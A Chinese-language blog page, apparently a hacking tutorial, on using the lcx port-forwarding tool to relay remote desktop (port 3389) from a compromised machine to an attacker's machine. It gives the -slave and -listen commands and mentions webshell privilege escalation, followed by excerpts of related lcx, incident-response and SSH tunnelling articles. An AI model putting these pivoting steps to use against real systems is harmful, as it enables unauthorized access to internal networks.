黑客入侵后端口转发利器lcx,开启3389旅途

lcx可以将内网端口映射到本机,缺点是需要本地电脑拥有外网IP,不然在某些情况lcx就无用武之地了。与之相比,reDuh更加优秀,后续会讲到。

lcx只有3中命令,常用的有2种。

首先在肉鸡上lcx.exe -slave 本机IP PORT1 肉鸡IP 3389

然后本地执行  lcx.exe -listen PORT1 PORT2;

登陆远程桌面 输入127.0.0.1:PORT2,即可登陆到肉鸡的桌面。

在肉鸡3389开启的情况下,webshell提权中也常用lcx进行内网转发。

时间: 2024-12-26 20:38:54

黑客入侵后端口转发利器lcx,开启3389旅途的相关文章

端口转发工具lcx使用两类

lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口.它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入侵工具,lcx在内网入侵渗透中起着重要的角色.lcx进行端口转发的原理就是使不同端口之间形成一个回路(如图1).它常用于外网连接内网3389端口. 这个工具很早就已经有了,它的全名叫Socket data transport tool,简写做trtool,由红盟联盟的前辈bkbll所写,功能和lio

公司服务器被黑客入侵后你要如何处理?

第一步:断网,无线和有线的都要断开 第二步:分析登录文件信息,搜索可能侵入的途径 被入侵后,决不是重新安装就可以了,还要分析主机被入侵的原因和途径,如果找出了问题点,就可能使您的主机以后更安全,同时也提高了自己的Linux水平. 如果不知道如何找出入侵途径,下次还有可能发生同样的事.一般: (1).分析登录文件:可以通过分析一些主要的登录文件找到对方的IP以及可能出现的漏洞.一般分析的文件为:/var/log/messages和/var/log/secure文件.还可以使用last命令找出最后一

内网渗透之端口转发

内网端口转发最常见的不外乎lcx与nc反弹了,好久不用快忘了,今天总结一下 一.使用lcx进行内网端口转发 Lcx.exe是一个端口转发工具,相当于把目标服务器A上的3389端口转发到具有外网ip地址的B机上(即我们自己的主机或是已经控制的主机),这样链接B机的3389端口就相当于链接A机的3389端口了,Lcx程序多用于被控制计算机处于内网的时候,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登录到本机进行管理方便,因此在很多情况下,都会想方设法在被控制计算机上开启3389

DLINK 企业路由器内网部署web开启端口转发后还需要开启是否支持端口回流功能

我自己用ac88u在家也有搭建web,开启端口转发就可以了 但是这个di-7100死活就是不行, 无奈之下,打客服吧 告知ip端口和用户名密码之后那边设置了一下 就可以了 完事她给我讲,这里需要设置 然后妹纸把我的 选项去掉了,我说不用开启么?提示说可以提高性能啊 妹纸笑了笑,说,啊,这个啊 然后我秒懂了,哈哈 没用的话,为啥要加呀,哈哈哈 原文地址:https://www.cnblogs.com/jnhs/p/11506312.html

网络安全系列之二 利用lcx实现内网端口转发

内网中的主机一般都是使用私有IP,在网络出口处经过NAT转换为公网IP之后,才能访问Internet.在这种网络结构下,通信双方之间实现的是单向访问,即只有内网中的主机可以主动访问Internet中的主机,反之则不行.如果在内网中架设了一台服务器,又需要允许Internet中的用户访问这台服务器,那么就必须在网络出口处进行端口映射.在网络攻防中,如果捕获了一台位于内网中的肉鸡,那么黑客是无法主动去连接这台肉鸡的,而且也不可能在人家的网络出口做端口映射,这时就可以用到lcx这个小工具了.下载地址:

CentOS下开启配置端口转发

开启IP转发 首先开启IP转发功能,默认是关闭的. 临时修改: # echo 1 >/proc/sys/net/ipv4/ip_forward 修改过后就马上生效,但如果系统重启后则又恢复为默认值0. 永久修改: vi /etc/sysctl.conf # 找到下面的值并将0改成1 net.ipv4.ip_forward = 1 # sysctl -p(使之立即生效) 默认值0是禁止ip转发,修改为1即开启ip转发功能. 配置端口转发 假设用户访问172.16.4.247:728时我想让它转发到

lcx端口转发 linux版

一.端口转发使用 1.攻击机上执行以下命令 ./lcx -p1 2222 -p2 3389 -m 2 在本地监听3389端口,并将发送到本机3389端口的数据传递到本机2222端口 2.跳板机上执行以下命令 ./lcx -h1 attackip -p1 2222 -h2 dstip -p2 3389 -m 3 与攻击机建立连接,并将来自攻击机2222端口的数据全部转发到目标机端口的3389 端口 3.以上连接建立完成后,就可以通过连接攻击机的3389端口,进行访问目标机的3389端口 二.代码

Mac下开启与关闭端口转发的脚本配置方法

一.依次运行以下命令: cd /etc ls | grep pf.conf sudo cp pf.conf pf.conf.normal.bak sudo cp pf.conf pf.conf.transmit.bak ls | grep pf.conf 二.修改 pf.conf pf.conf.transmit.bak sudo gedit pf.conf.transmit.bak OR: sudo vim pf.conf.transmit.bak 修改的内容参照上一篇配置端口转发的博文,我这

ssh端口转发--开启多个加密通道

  一.ssh端口转发连接数据库 今天发现了一个好玩的功能,让ssh服务监听2个端口,并且使用ssh端口转发用这两个端口登录远程的rac数据库.以前都是让ssh服务监听一个端口并且开一个端口转发,没想到可以监听多个端口. 为什么要这样呢?集团的vpn登录一直都限制1521端口.限制外网的22端口,所以如果在家用这个接入平台的话,就只能将服务器的ssh端口换一个,这个规则很讨厌,每次我都是登录到vcenter上修改服务器的ssh端口,例如改成222.但公司内部不限制22端口,每次到公司,我再把这个